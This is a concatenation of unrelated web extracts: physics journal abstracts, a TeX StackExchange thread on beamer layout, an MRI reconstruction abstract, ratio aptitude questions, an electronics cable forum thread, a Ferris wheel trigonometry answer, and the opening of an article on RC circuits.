https://www.actaphys.uj.edu.pl/index_n.php?I=R&V=21&N=3

### Regular Series
#### Vol. 21 (1990), No. 3, pp. 171 – 252
Charges, Monopoles and Unit Systems
Acta Phys. Pol. B 21, 171 (1990)
Using an explicit notation for units, it is argued that electromagnetic fields measured by means of a charge and the corresponding fields measured by means of a monopole are different physical entities. This result is related to the persistent failure of the experimental quest for monopoles.
Thermodynamics of Negative Absolute Pressures
Acta Phys. Pol. B 21, 177 (1990)
States with negative absolute pressure are investigated from a thermodynamic viewpoint. It is found that the negativity of pressure does not contradict Callen's postulates, and that the postulates cannot be extended in a natural way to rule out just these states. These states may be stable against small fluctuations. In nuclear physics, QCD and GUTs, $p < 0$ states are easy to interpret thermodynamically.
Instantons in QCD and Soliton Models of Hadrons
Acta Phys. Pol. B 21, 189 (1990)
Using an analogy to a well-known soliton model of hadrons, the existence of the quark sea appearing in deep inelastic lepton-hadron scattering is justified. Then, using the existence of the $\langle \bar{\psi} \psi \rangle$ condensate in QCD, we insert into the QCD functional integral a Lorentz scalar field which describes the quark-antiquark pairs and produces a dynamical mass for quarks.
Dirac Equation with Hidden Extra Spins: A Generalization of Kähler Equation. Part Two
Acta Phys. Pol. B 21, 201 (1990)
A sequence of equations enumerated by $N = 1, 2, 3, \dots$, realizing the Dirac square-root procedure for spin $0 \otimes 1 \otimes \dots \otimes \frac{1}{2}N$ ($N$ even) or $\frac{1}{2} \otimes \frac{3}{2} \otimes \dots \otimes \frac{1}{2}N$ ($N$ odd), is further discussed. For $N = 2$ the Dirac-type form of the Kähler equation is reproduced. The equation with $N = 3$ is conjectured to be physically distinguished, providing a model for fermion generations.
Finite Temperature Effect on Strings in Curved Space
Acta Phys. Pol. B 21, 209 (1990)
Using thermofield dynamics we study finite temperature effects on strings in curved space.
M. Tariq, Tauseef Ahmad, M. Zafar, M. Irfan, M.Z. Ahsan, M. Shafi
Some Angle Dependent Characteristics of Charged Shower Particles Produced at High Energies
Acta Phys. Pol. B 21, 215 (1990)
The angular distributions of shower particles in the lab and c.m. systems have been studied for various effective target thicknesses. The variation of particle number densities in the lab and c.m. systems has also been given as a function of $\bar \nu$. It is observed that the particle density decreases with effective target mass in the most forward region in the laboratory system, whereas it shows an increasing trend in the c.m. system. The results seem to agree with CTM-type pictures of the interaction. Some results on the variation of $R_{\rm A}$ in different $\eta$-intervals have also been presented.
Nuclear Matter Approach to the Heavy-Ion Optical Potential and the Proximity Approximation
Acta Phys. Pol. B 21, 223 (1990)
A simple theory of the heavy-ion optical potential $\mathcal{V}$, based on the local density approach and the frozen density model, is used to derive the energy-dependent proximity approximation $\mathcal{V}^{\rm P}$ for the complex potential $\mathcal{V}$. Both $\mathcal{V}$ and $\mathcal{V}^{\rm P}$ are calculated, and the accuracy of the proximity approximation and of the scaling law implied by the approximation is tested.
Strange Matter Bubble Formation Inside Neutron Matter
Acta Phys. Pol. B 21, 245 (1990)
The initial stages of the phase transition of neutron matter into strange matter at zero temperature and finite pressure are considered. Bubble formation is calculated numerically for pressures typical of a neutron star interior. The critical bubble size decreases rapidly with pressure, reaching a minimum at $p \sim 20$ MeV/fm$^3$.
http://tex.stackexchange.com/questions/23525/side-to-side-figure-and-table-in-beamer-problem?answertab=votes

# Side-to-side figure and table in beamer problem
\begin{figure}
%\centering
\begin{minipage}[h]{0.58\textwidth}
\centering
\includegraphics[scale=0.4,trim=12mm 15mm 12mm 15mm]{fig1}
\end{minipage}
\begin{minipage}[h]{0.38\textwidth}
\centering
\include{fig2}
\end{minipage}
\end{figure}
I get fig1 nicely placed in the center of the left side, BUT fig2 'sank' to the bottom of the right side. I don't really know what's wrong with the code. Actually fig2 is a table which I store as a tex file with code only, something like:
\begin{tabular}{|c|c|}
\hline
aa & bb \\ \hline
0 & 10 \\ \hline
1 & 2 \\ \hline
\end{tabular}
Hope someone will help me fix this. Thanks in advance.
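One thing worth noting about the snippet above: `\include` issues `\clearpage` before and after the file it reads, and cannot be used inside a box such as a minipage, so `\input` is the right tool for pulling in the stored tabular. A minimal sketch of the fixed question code (assuming fig2.tex contains just the tabular; `[c]` aligns both minipages on a common vertical center):

```latex
\begin{figure}
  \begin{minipage}[c]{0.58\textwidth}
    \centering
    \includegraphics[scale=0.4,trim=12mm 15mm 12mm 15mm]{fig1}
  \end{minipage}%
  \begin{minipage}[c]{0.38\textwidth}
    \centering
    \input{fig2} % fig2.tex holds only the tabular code
  \end{minipage}
\end{figure}
```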
A tip: If you indent lines by 4 spaces, then they are marked as a code sample. You can also highlight the code and click the "code" button (with "{}" on it). – lockstep Jul 19 '11 at 18:01
@lockstep thanks for the tip. I was about to do it. Too rushed to post the question. – hotaru Jul 19 '11 at 18:05
Sorry - I wasn't sure if you knew this feature, but I should have waited 5 minutes nevertheless. – lockstep Jul 19 '11 at 18:08
@lockstep don't worry about that... the more important thing is to get the right answer. – hotaru Jul 19 '11 at 18:22
May I suggest that you use
\RequirePackage[demo]{graphicx} % So the demo works!
\documentclass{beamer}
\begin{document}
\begin{frame}
\begin{columns}
\begin{column}{0.5\textwidth}
\centering
\includegraphics[width = 2 cm]{demo}
\end{column}
\begin{column}{0.5\textwidth}
\centering
\includegraphics[width = 2 cm]{demo}
\end{column}
\end{columns}
\end{frame}
\end{document}
I tried this (of course, after you suggested it). Ehm... it doesn't work. Actually fig2 is a table which I store in a tex file, with code something like in the question (sorry, just added this) – hotaru Jul 19 '11 at 18:24
@hotaru: then, please edit your question and include a minimal working example (MWE) illustrating the problem. I ask you for this MWE since I used a solution similar to the one by 5gon12eder and everything worked as expected. – Gonzalo Medina Jul 19 '11 at 19:02
You want the optional argument to the column environment:
\RequirePackage[demo]{graphicx}
\documentclass{beamer}
\begin{document}
\begin{frame}
\begin{columns}[T]
\begin{column}{0.5\textwidth}
\centering
\includegraphics[height = 2 cm]{demo}
\end{column}
\begin{column}{0.5\textwidth}
\centering
\includegraphics[height = 1 cm]{demo}
\end{column}
\end{columns}
\end{frame}
\end{document}
(beamer manual, section 12.7)
The subfig package is excellent for side-by-side figures and tables.
There is a nice example here: https://secure.wikimedia.org/wikibooks/en/wiki/LaTeX/Floats,_Figures_and_Captions#Subfloats
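A minimal sketch of that pattern (untested here; the `demo` option of graphicx substitutes a placeholder so no real image file is needed, and fig1 is a hypothetical name):

```latex
\documentclass{article}
\usepackage{subfig}
\usepackage[demo]{graphicx} % placeholder boxes instead of real images
\begin{document}
\begin{figure}
  \centering
  \subfloat[A figure]{\includegraphics[width=0.45\textwidth]{fig1}}\hfill
  \subfloat[A table]{%
    \begin{tabular}{|c|c|}
      \hline aa & bb \\ \hline 0 & 10 \\ \hline 1 & 2 \\ \hline
    \end{tabular}}
  \caption{A figure and a table side by side.}
\end{figure}
\end{document}
```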
If you mean that advice as an answer, it would be great if you could rephrase it, since this suggestion to the OP reads like a comment. It would be good to elaborate on it, besides posting a link. – Stefan Kottwitz Sep 3 '11 at 18:56
Sorry, unfortunately I don't have the required reputation to comment under the question yet. Also, the example link does go straight to a relevant code snippet, so copy-and-pasting it seemed unnecessary - I did not realize this violated etiquette. – Dan Sep 3 '11 at 20:31
https://www.aimsciences.org/article/doi/10.3934/naco.2020027

# American Institute of Mathematical Sciences
June 2021, 11(2): 307-320. doi: 10.3934/naco.2020027
## Novel Conditions of Euclidean space controllability for singularly perturbed systems with input delay
Department of Applied Mathematics, ORT Braude College of Engineering, Karmiel, Israel, and, Independent Center for Studies, in Control Theory and Applications, Haifa, Israel
Received August 2019. Revised March 2020. Published June 2021 (early access May 2020).
A singularly perturbed linear time-dependent controlled system with a point-wise non-small (of order $1$) delay in the input (the control variable) is considered. Sufficient conditions of the complete Euclidean space controllability for this system, robust with respect to the parameter of singular perturbation, are derived. This derivation is based on an asymptotic analysis of the controllability matrix for the considered system and of the determinant of this matrix. However, the derivation does not use a slow-fast decomposition of the considered system. The theoretical result is illustrated by an example.
Citation: Valery Y. Glizer. Novel Conditions of Euclidean space controllability for singularly perturbed systems with input delay. Numerical Algebra, Control and Optimization, 2021, 11 (2) : 307-320. doi: 10.3934/naco.2020027
http://indexsmart.mirasmart.com/ISMRM2018/PDFfiles/3543.html | ### 3543
Rapid Parallel MRI Reconstruction Utilizing the Wavelet Filter Bank
Efrat Shimron1, Andrew G. Webb2, and Haim Azhari1
1Department of Biomedical Engineering, Technion - Israel Institute of Technology, Haifa, Israel, 2Department of Radiology, Leiden University, Leiden, Netherlands
### Synopsis
A novel method for reconstruction from highly undersampled parallel MRI data is proposed. The method computes the Stationary Wavelet Transform (SWT) of the unknown MR image directly from sub-sampled k-space measurements, and then recovers the image using the Inverse SWT filter bank. Experiments with in-vivo data show that this method produces high quality reconstructions, comparable to Compressed Sensing (CS) reconstructions. However, unlike CS, the proposed method is non-iterative. Moreover, it is simple, fast, and allows flexible (random or ordered) k-space undersampling schemes.
### Purpose
Parallel Imaging (PI) and Compressed Sensing (CS) are two well-established approaches for image reconstruction from undersampled k-space data. CS-MRI methods offer high k-space undersampling, using random schemes, at the price of time-intensive iterative computations; these computations involve repetitive applications of forward and inverse transforms of two types: the Fourier transform and a sparsifying transform. PI methods enable rapid ordered sampling trajectories and faster computations; however, they commonly do not exploit the benefits offered by non-Fourier transforms. This work introduces a novel PI reconstruction method that offers fast non-iterative computations, is suitable for arbitrary undersampling of a Cartesian k-space, and operates in the Stationary Wavelet Transform (SWT) domain.
### Theory
The proposed PI method consists of two steps: (i) computation of the full SWT decomposition of the unknown MR image directly from the sub-sampled k-space data, and (ii) image reconstruction by implementation of the Inverse Stationary Wavelet Transform (ISWT) filter bank.
The method exploits the theory of convolution-image computation [1] for parallel multi-coil acquisition. Essentially, given k-space data sub-sampled along columns (or rows), this theory allows the computation of the convolution between the unknown MR image $f(x,y)$ and a user-defined kernel $g(x)$, i.e.
$$h(x,y)=f(x,y)*g(x).$$
In step (i) of the proposed method, this equation is implemented separately with two kernels corresponding to the first-level SWT filters of an analysis filter bank [2]. In other words, $g(x)$ is first defined as the Low-Pass Decomposition (LPD) filter and $h^{LP}(x,y)=f(x,y)*g^{LPD}(x)$ is computed. Secondly, $g(x)$ is defined as the High-Pass Decomposition (HPD) filter, and $h^{HP}(x,y)=f(x,y)*g^{HPD}(x)$ is computed. By definition [2], these computations produce the first-level approximation and detail coefficients of the 1D SWT of $f(x,y)$, where the transform is performed along rows.
In step (ii) of the proposed method, $f(x,y)$ is reconstructed by the ISWT, i.e. through the synthesis filter bank. In this process, the Low-Pass Reconstruction (LPR) filter $g^{LPR}(x)$ and High-Pass Reconstruction (HPR) filter $g^{HPR}(x)$ are applied to $h^{LP}(x,y)$ and $h^{HP}(x,y)$ correspondingly, and the results are summed, producing the reconstructed image,
$$f^{rec}(x,y)=h^{LP}(x,y)*g^{LPR}(x)+h^{HP}(x,y)*g^{HPR}(x).$$
According to wavelet filter bank theory, the two decomposition filters $g^{LPD}(x)$, $g^{HPD}(x)$ and the two synthesis filters $g^{LPR}(x)$, $g^{HPR}(x)$ together form a two-channel quadrature mirror filter bank.
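The two steps can be sketched numerically with NumPy. This is an illustration only: it uses Haar filters as a stand-in for the Daubechies-2 pair named in the Methods, and realizes the convolutions as products in the Fourier domain (the convolution theorem), in place of the actual multi-coil computation of Ref. 1:

```python
import numpy as np

# Haar analysis filters -- an assumed stand-in for the Daubechies-2 pair;
# the two-channel filter-bank structure is identical.
lpd = np.array([1.0, 1.0]) / np.sqrt(2.0)   # low-pass decomposition (LPD)
hpd = np.array([1.0, -1.0]) / np.sqrt(2.0)  # high-pass decomposition (HPD)

rng = np.random.default_rng(1)
f = rng.standard_normal(16)                 # one row f(x, y0) of the image
N = f.size

F = np.fft.fft(f)                           # "k-space" of the row
Glpd = np.fft.fft(lpd, N)                   # filter transfer functions
Ghpd = np.fft.fft(hpd, N)

# Step (i): undecimated (stationary) wavelet bands, computed as circular
# convolutions via pointwise products in the Fourier domain.
a = np.real(np.fft.ifft(F * Glpd))          # approximation coefficients
d = np.real(np.fft.ifft(F * Ghpd))          # detail coefficients

# Step (ii): synthesis with the time-reversed (conjugate-response) filters;
# the undecimated bank returns 2*f, hence the factor 1/2.
f_rec = 0.5 * np.real(np.fft.ifft(np.fft.fft(a) * np.conj(Glpd)
                                  + np.fft.fft(d) * np.conj(Ghpd)))

assert np.allclose(f_rec, f)                # perfect reconstruction
```

The final assertion checks the perfect-reconstruction property of the two-channel bank: $|G^{LPD}(\omega)|^2 + |G^{HPD}(\omega)|^2 = 2$ for all $\omega$, so synthesis recovers the row exactly.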
### Methods
The proposed method was implemented on in-vivo data from two T1-weighted 7 Tesla scans of a healthy volunteer using a 32-coil receive array. Sensitivity maps were estimated from low-resolution pre-scans. After acquiring high-resolution scans, k-space data were retrospectively sub-sampled in one dimension with a reduction factor $R=4$. The proposed method was implemented with the SWT Daubechies-2 wavelet filter bank and an additional single-step soft-thresholding for denoising. Results of this method were compared with those of a recent CS method that utilizes the SWT [3]. All reconstructions were compared to a gold standard reconstruction (from a fully sampled k-space) by using the NRMSE measure.
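All comparisons use the NRMSE; since the abstract does not spell out the normalization, the sketch below assumes the common range-normalized convention (an assumption, not necessarily the authors' choice):

```python
import numpy as np

def nrmse(recon, gold):
    """RMS error normalized by the gold standard's intensity range
    (an assumed convention; the abstract does not state which is used)."""
    err = np.sqrt(np.mean(np.abs(recon - gold) ** 2))
    return err / (np.abs(gold).max() - np.abs(gold).min())

gold = np.linspace(0.0, 3.0, 4)   # toy "gold standard" image values
recon = gold + 0.1                # a reconstruction with a constant bias
# RMS error = 0.1, intensity range = 3, so NRMSE = 0.1/3
assert abs(nrmse(recon, gold) - 0.1 / 3.0) < 1e-12
```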
### Results
Figure 1 demonstrates the SWT coefficients computed from the in-vivo data. It includes the approximation (low-pass) and detail (high-pass) coefficients computed from 25% of the k-space data by the proposed method (left column), and those computed from the fully sampled data (right column). Clearly, our method produced a highly accurate reconstruction of the SWT coefficients. Figure 2 shows the final image reconstructions of the same data set. The proposed method produced an image which includes all the anatomical structures that are present in the gold standard image, without discernible artifacts. This excellent reconstruction quality is reflected by the low NRMSE value of 0.012. It is also apparent from Figure 2 that our single-step method produced a reconstruction very similar to the CS reconstruction, while the latter method required 24 iterations for convergence.
Similar high-quality results were obtained in a second in-vivo experiment (figure 3). Our proposed method produced an image similar to the gold standard and to the CS reconstruction. In this case, the CS process required 85 iterations for convergence to the same NRMSE level obtained by our single-step method.
### Discussion & Conclusion
This work introduces a novel parallel MRI method that utilizes efficient wavelet-domain processing. This method reconstructs the SWT coefficients of the unknown MR image directly from highly undersampled k-space data, and then reconstructs the image using the ISWT filter bank.
The proposed method offers the following advantages: (1) a non-iterative reconstruction process, which yields results comparable to those of an iterative CS reconstruction, (2) flexible arbitrary undersampling of a Cartesian k-space, and (3) efficient data processing in the redundant SWT domain. Due to its simplicity and fast implementation, the proposed method may be highly suitable for real-time MRI applications.
### References
1. Azhari H, Sodickson DK, Edelman RR. Rapid MR imaging by sensitivity profile indexing and deconvolution reconstruction (SPID). Magnetic Resonance Imaging. 2003;21(6):575–584.
2. Mallat SG. A wavelet tour of signal processing. Academic Press; 1999.
3. Kayvanrad MH, McLeod AJ, Baxter JSH, McKenzie CA, Peters TM. Stationary wavelet transform for under-sampled MRI reconstruction. Magnetic Resonance Imaging. 2014;32(10):1353–1364.
### Figures
Figure 1: Reconstruction of the Stationary Wavelet Transform (SWT) of the unknown MR image from an in-vivo 32-coil parallel head scan. Left: reconstruction from 25% of k-space data using the proposed method. Right: reconstruction from the fully-sampled k-space data.
Figure 2: Final reconstructions from an in-vivo experiment. Top row: reconstructions from 25% of k-space data using the proposed non-iterative method (left), and an SWT-based Compressed Sensing method (middle) that converged after 24 iterations. Right: reconstruction from the fully-sampled k-space data. Bottom row: reconstruction errors with their NRMSE values.
Figure 3: Final reconstructions from the second in-vivo experiment. Top row: reconstructions from 25% of k-space data using the proposed non-iterative method (left), and an SWT-based Compressed Sensing method (middle) that converged after 85 iterations. Right: reconstruction from the fully-sampled k-space data. Bottom row: reconstruction errors with their NRMSE values.
Proc. Intl. Soc. Mag. Reson. Med. 26 (2018)
3543 | 2022-05-20 13:23:43 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.38748544454574585, "perplexity": 2878.8568660759656}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662532032.9/warc/CC-MAIN-20220520124557-20220520154557-00126.warc.gz"} |
http://examfriend.in/questions-and-answers/Arithmetic-aptitude/Ratio-and-Proportion/General-Questions/0.html | 12345>>
1.
Express 60 minutes as the fraction of one day.
A) $\frac{1}{12}$
B) $\frac{1}{20}$
C) $\frac{1}{24}$
D) $\frac{1}{18}$
E) $\frac{1}{36}$
2.
The compound ratio of $(1 : 2)$, $(3 : 2 )$, $(5 : 1)$ is
A) 7 : 1
B) 2 : 5
C) 15 : 4
D) 4 : 15
E) 7 : 5
3.
Vimal's age and Amala's age are in the ratio 3 : 5, and the sum of their ages is 80 years. The ratio of their ages after 10 years will be
A) 2 : 3
B) 1 : 3
C) 3 : 5
D) 2 : 5
E) 4 : 5
4.
If Rs.91 is divided among A, B and C in the ratio $1\frac{1}{2}:3\frac{1}{3}:2\frac{3}{4}$, then B will get
A) Rs.36
B) Rs.40
C) Rs.45
D) Rs.48
E) Rs.55
5.
A vessel contains 56 litres of a mixture of milk and water in the ratio 5 : 2. How much water should be mixed with it so that the ratio of milk to water becomes 4 : 5?
A) 16 litres
B) 30 litres
C) 28 litres
D) 34 litres
E) 45 litres
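The five questions above can be checked mechanically with exact fractions; this sketch works each one out and confirms the option it lands on.

```python
from fractions import Fraction as F

# Q1: 60 minutes as a fraction of one day (24 * 60 minutes) -> 1/24, option C
assert F(60, 24 * 60) == F(1, 24)

# Q2: compound ratio = product of antecedents : product of consequents
#     (1*3*5) : (2*2*1) = 15 : 4, option C
assert F(1 * 3 * 5, 2 * 2 * 1) == F(15, 4)

# Q3: ages 3k and 5k with sum 80 -> 30 and 50; after 10 years 40:60 = 2:3, option A
k = 80 // (3 + 5)
assert F(3 * k + 10, 5 * k + 10) == F(2, 3)

# Q4: shares 3/2 : 10/3 : 11/4 scale to 18 : 40 : 33 (sum 91),
#     so B receives Rs.40 of the Rs.91, option B
parts = [F(3, 2), F(10, 3), F(11, 4)]
b_share = 91 * parts[1] / sum(parts)
assert b_share == 40

# Q5: 56 L at milk:water = 5:2 -> 40 L milk, 16 L water;
#     40 / (16 + x) = 4/5  =>  x = 34 litres, option D
milk, water = 56 * F(5, 7), 56 * F(2, 7)
x = milk * F(5, 4) - water
assert x == 34
```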
12345>> | 2019-03-23 06:31:55 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.80750972032547, "perplexity": 2493.974966210648}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-13/segments/1552912202728.21/warc/CC-MAIN-20190323060839-20190323082839-00349.warc.gz"} |
https://forum.allaboutcircuits.com/threads/copper-conductors.84470/ | # copper conductors
#### masudasim
Joined Jul 10, 2010
15
Hello all
I need an insulated multi-stranded copper conductor which can carry 8-9 A, should be screened, and has insulation that can withstand a working voltage of at least 1.5 kVrms. Moreover, the insulation should be flexible, as this cable needs to be wound/unwound regularly.
As far as current-carrying capacity is concerned, I think AWG 11/12 will be suitable for me. The problem I face is finding a combination of individual screening, flexibility, and high working voltage, i.e. 1.5 kVrms.
Can anyone kindly suggest a solution, especially regarding the type of insulation suitable (for 1.5 kVrms and flexible) as well as the screening?
Thanks
Note: The most common insulation I found during my search is PVC, but its flexibility/voltage rating is in question.
#### PackratKing
Joined Jul 13, 2008
843
what kind of hardware is it required to un/wind from, and how long a distance does it have to cover... pictures would help... and where on earth are you...
Standard 7-lead thermostat wire is fairly close to what you need... 24 awg stranded conductors, PTFE insulation.
I hook florescent lighting up with it, so voltage is not an issue, since it does not have to flex... tho' there are many ways of "skinning a cat"
#### PackratKing
Joined Jul 13, 2008
843
Voltage IS an issue.. typical 150V or 300V thermostat wire is NOT suitable for 1500V working voltage...
You are right , Mcgyvr, Florescents are HV items indeed, tho' the current is so low, and my Hi-Pot indicated the insulation would handle the load -
This setup was one temporary unit for lighting in my shop, after my 1 year old $13 chinese florescent fixtures' ballast violently released its magic smoke and a shower of hot tar... cussed chinese <snip> anyway -- the stench of burning ballast lingers still...
The temporary lighting has since been dismantled, and replaced with some good Made in U.S.A. gear, and I wouldn't recommend anyone else trying to build anything like it...
Last edited:
#### masudasim (Thread Starter)
Joined Jul 10, 2010
15
Thanks very much for the help. I will check this cable.
#### mcgyvr
Joined Oct 15, 2009
5,394
(quoting PackratKing's post above)
Just because it "works" doesn't mean its right.. Since I actually work in the professional world I know that you MUST ensure the items you use are rated to the levels you need.. If I went into UL with a product designed for 1.5kV working voltage with a 600V rated cable they will just laugh me out of there (at my expense)..
Heck even the thinnest wire insulation should pass a 1000V hipot test.. But voltage ratings are determined by way more than just a "fresh insulation" hipot test.
So my answers on this forum are usually from a "I don't care if it works.. if it isn't rated for that then don't do it" perspective. | 2019-11-22 15:50:33 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.25336089730262756, "perplexity": 5011.962073089962}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496671363.79/warc/CC-MAIN-20191122143547-20191122172547-00555.warc.gz"} |
http://www.jiskha.com/display.cgi?id=1368110443 | Monday
September 22, 2014
# Homework Help: math trig
Posted by Zoe on Thursday, May 9, 2013 at 10:40am.
For a Ferris wheel with a 20.5 meter radius, how high would one car be from the loading dock at these given angles traveled by the rider?
90
135
180
225
270
315
405
450
495
and 540?
• math trig - Reiny, Thursday, May 9, 2013 at 12:33pm
I will do two of these,
for 135° :
assume the axle is 20.5 above the ground
height above axle:
sin135 = h/20.5
h = 20.5sin135 = appr 14.5 m
so height above the ground = 20.5 + 14.5 = 35
for 315°
height from axle :
sin 315 = h/20.5
h = 20.5sin315 = appr -14.5
notice the position would be BELOW the axle
so height above ground = 20.5 - 14.5 = 6 m
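The rest of the list follows the same pattern. A sketch using the convention worked above (axle assumed 20.5 m above the ground, height = 20.5 + 20.5 sin θ); how the travelled angle is measured relative to the axle is the main assumption here, carried over from the two worked cases.

```python
import math

r = 20.5  # wheel radius in metres; the axle is assumed 20.5 m above the ground

def height(deg):
    """Height above the ground: axle height plus the signed
    height above/below the axle, as in the worked cases."""
    return r + r * math.sin(math.radians(deg))

assert abs(height(135) - 35.0) < 0.1   # matches the 135 degree case above
assert abs(height(315) - 6.0) < 0.1    # matches the 315 degree case above

for deg in (90, 135, 180, 225, 270, 315, 405, 450, 495, 540):
    print(deg, round(height(deg), 1))
```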
http://mymathforum.com/calculus/331264-finding-length-graph-polar.html | My Math Forum Finding the length of a graph (polar)
Calculus Calculus Math Forum
May 4th, 2016, 05:17 PM, #1, Member (Joined: May 2015, From: Earth, Posts: 64, Thanks: 0):
Given that $r=-4\sin(\theta)$, how does one find the length of the curve for this graph? I took the integral of $\displaystyle \sqrt{16\sin(\theta)^2 + 16\cos(\theta)^2}$ from 0 to $2\pi$, which would give me $8\pi$ as my answer. However, the correct answer is $4\pi$. Why is this? Is the integral from 0 to $\pi$ instead? Does this mean if I were to find the area of this shape, the integral would also be to $\pi$ instead of $2\pi$? Thanks.
Last edited by skipjack; May 4th, 2016 at 08:45 PM.
May 4th, 2016, 05:25 PM, #2, Math Team (Joined: Dec 2013, From: Colombia, Posts: 7,276, Thanks: 2437; Math Focus: Mainly analysis and algebra):
Yes. The domain is between zero and $\pi$. After that, it just starts tracing out the same shape again. Yes, for the area, you would also be integrating from zero to $\pi$.
May 4th, 2016, 05:25 PM, #3, Member:
Thanks for the quick answer, archie!
May 4th, 2016, 05:26 PM, #4, Math Team:
It's a circle of radius 2, not 4.
https://www.transtutors.com/questions/2c-find-the-elasticity-of-money-demand-with-respect-to-real-output-at-the-equilibriu-5133346.htm | # 2c) Find the elasticity of money demand with respect to real output at the equilibrium values...
2c) Find the elasticity of money demand with respect to real output at the equilibrium values (recall from your first year class: 47. or 14 x (5)
2d) The central bank increases the nominal money supply by 10%. Assume that the real interest rate is constant since it is determined by the goods market equilibrium.
• Show what happens to expected inflation if the price level stays constant in the short run. (4)
• Instead, assume that expected inflation remains constant but the price level responds; what is the new price level? (4)
http://www.last.fm/music/Trovadores+Urbanos/+similar | 1. We don't have a wiki here yet...
7. Oscar Castro-Neves (15/5/1940 - Rio de Janeiro) is a gifted Brazilian musician settled in the U.S. since 1966. Besides his important contribution to…
18. Paulo Artur Mendes Pupo Nogueira, or just Paulinho Nogueira (1929-2002), was an eclectic Brazilian composer and musician, with influences of Bossa… | 2015-11-30 22:36:26 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8999199867248535, "perplexity": 5209.239523573008}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-48/segments/1448398464253.80/warc/CC-MAIN-20151124205424-00000-ip-10-71-132-137.ec2.internal.warc.gz"} |
https://en.wikipedia.org/wiki/Rc_circuit | # RC circuit
A resistor–capacitor circuit (RC circuit), or RC filter or RC network, is an electric circuit composed of resistors and capacitors driven by a voltage or current source. A first order RC circuit is composed of one resistor and one capacitor and is the simplest type of RC circuit.
RC circuits can be used to filter a signal by blocking certain frequencies and passing others. The two most common RC filters are the high-pass filters and low-pass filters; band-pass filters and band-stop filters usually require RLC filters, though crude ones can be made with RC filters.
## Introduction
There are three basic, linear passive lumped analog circuit components: the resistor (R), the capacitor (C), and the inductor (L). These may be combined in the RC circuit, the RL circuit, the LC circuit, and the RLC circuit, with the acronyms indicating which components are used. These circuits, among them, exhibit a large number of important types of behaviour that are fundamental to much of analog electronics. In particular, they are able to act as passive filters. This article considers the RC circuit, in both series and parallel forms, as shown in the diagrams below.
## Natural response
RC circuit
The simplest RC circuit is a capacitor and a resistor in parallel. When a circuit consists of only a charged capacitor and a resistor, the capacitor will discharge its stored energy through the resistor. The voltage across the capacitor, which is time dependent, can be found by using Kirchhoff's current law, where the current charging the capacitor must equal the current through the resistor. This results in the linear differential equation
${\displaystyle C{\frac {dV}{dt}}+{\frac {V}{R}}=0}$.
where C is the capacitance of the capacitor.
Solving this equation for V yields the formula for exponential decay:
${\displaystyle V(t)=V_{0}e^{-{\frac {t}{RC}}}\ ,}$
where V0 is the capacitor voltage at time t = 0.
The time required for the voltage to fall to ${\displaystyle {\frac {V_{0}}{e}}}$ is called the RC time constant and is given by
${\displaystyle \tau =RC\ .}$
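As a cross-check of this solution, the governing equation C dV/dt + V/R = 0 can be integrated numerically and compared with the exponential; the component values below are arbitrary, chosen only to give a 1 ms time constant.

```python
import math

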